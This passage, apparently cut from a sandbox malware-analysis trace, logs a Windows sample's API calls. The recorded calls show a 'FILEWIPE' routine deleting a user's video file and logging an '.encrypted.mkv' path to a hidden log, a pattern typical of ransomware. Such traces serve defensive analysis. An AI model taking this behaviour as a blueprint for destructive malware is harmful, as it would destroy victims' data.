wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.602] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.602] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.602] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0042.602] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0042.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.603] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65773250, ftCreationTime.dwHighDateTime=0x1d5b807, ftLastAccessTime.dwLowDateTime=0x1244f2b0, ftLastAccessTime.dwHighDateTime=0x1d5b948, ftLastWriteTime.dwLowDateTime=0x1244f2b0, ftLastWriteTime.dwHighDateTime=0x1d5b948, nFileSizeHigh=0x0, nFileSizeLow=0x18f35, dwReserved0=0x0, dwReserved1=0x777648, cFileName="mRin.mkv", cAlternateFileName="")) returned 0x7c2100 [0042.603] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0042.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0042.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0042.603] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.603] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.603] CharLowerBuffW (in: lpsz="byte[102197]", cchLength=0xc | out: lpsz="byte[102197]") returned 0xc [0042.604] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.604] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.604] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.604] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0042.604] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0042.604] FreeLibrary (hLibModule=0x76b40000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0042.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0042.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0042.605] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.605] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.605] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.606] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0042.606] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\mrin.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0042.607] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.607] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.607] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.607] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0042.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.607] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.608] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.608] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0042.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.608] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.608] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.609] FreeLibrary (hLibModule=0x76e10000) returned 1 [0042.609] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.609] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.609] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.609] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpFilePart=0x0) returned 0x34 [0042.609] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65773250, ftCreationTime.dwHighDateTime=0x1d5b807, ftLastAccessTime.dwLowDateTime=0x1244f2b0, ftLastAccessTime.dwHighDateTime=0x1d5b948, ftLastWriteTime.dwLowDateTime=0x1919cfa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x18f35, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="mRin.mkv", cAlternateFileName="")) returned 0x7c2100 [0042.609] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\mrin.mkv")) returned 1 [0042.611] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x65773250, ftCreationTime.dwHighDateTime=0x1d5b807, ftLastAccessTime.dwLowDateTime=0x1244f2b0, ftLastAccessTime.dwHighDateTime=0x1d5b948, ftLastWriteTime.dwLowDateTime=0x1919cfa0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x18f35, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="mRin.mkv", cAlternateFileName="")) returned 0 [0042.611] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.611] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.611] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.611] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.611] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.612] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.612] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.612] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.612] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.612] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.612] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0042.612] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.612] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.613] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.613] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.613] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.613] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.613] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.613] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.613] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x34d4, lpOverlapped=0x0) returned 1 [0042.614] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.614] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x34d4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.614] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.encrypted.mkv\r\n", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0042.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x41) returned 0x88e138 [0042.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.encrypted.mkv\r\n", cchWideChar=65, lpMultiByteStr=0x88e138, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\mRin.encrypted.mkv\r\n", lpUsedDefaultChar=0x0) returned 65 [0042.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.614] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0042.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0042.614] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x40, lpOverlapped=0x0) returned 1 [0042.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0042.614] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.614] CloseHandle (hObject=0x140) returned 1 [0042.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.618] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.618] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.618] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 